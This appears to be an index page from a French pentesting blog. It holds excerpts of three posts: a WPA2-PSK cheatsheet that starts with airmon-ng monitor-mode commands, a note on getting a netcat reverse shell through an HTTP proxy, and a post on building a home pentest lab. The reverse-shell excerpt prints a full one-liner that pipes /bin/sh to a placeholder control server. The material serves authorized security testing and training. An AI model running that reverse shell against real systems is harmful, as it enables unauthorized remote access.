Cheatsheet : WPA2-PSK

Posted on mer. 20 mai 2020 in cheatsheet • Tagged with infosec, pentest, wifi, aircrack

Disclaimer

N'effectuez ces manipulations que sur des réseaux/machines pour lesquelles vous avez une autorisation explicite.

Mode monitoring

  • Désactiver la gestion de l'interface par NetworkManager :
nmcli dev set wlan0 managed no
  • Activer le mode monitoring sur l'interface :
airmon-ng start wlan0

L'interface de monitoring est maintenant wlan0mon ou assimilé (check avec …


Continue reading

Post-it : Reverse shell à travers un proxy HTTP

Posted on ven. 14 juin 2019 in post-it • Tagged with pentest, post-exploitation

Obtenir un reverse shell :

  • via netcat
  • sans droits root
  • en traversant un proxy HTTP
mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1 | nc -X connect -x [IP Proxy]:[Port Proxy] [IP du serveur de contrôle] [Port en écoute pour le reverse shell] > /tmp/f; rm /tmp/f …

Continue reading

Création d'un lab de pentest à la maison

Posted on jeu. 18 octobre 2018 in vrac • Tagged with pentest, tools, virtualisation, lab

Depuis un certain temps, j'avais dans la tête l'idée de me créer un lab de pentest chez moi. Le but était d'avoir un "micro-réseau" d'entreprise (avec les éléments qu'on retrouve souvent dans une entreprise classique) pour pouvoir tester des outils et méthodes et monter en compétences sur les différentes technos …


Continue reading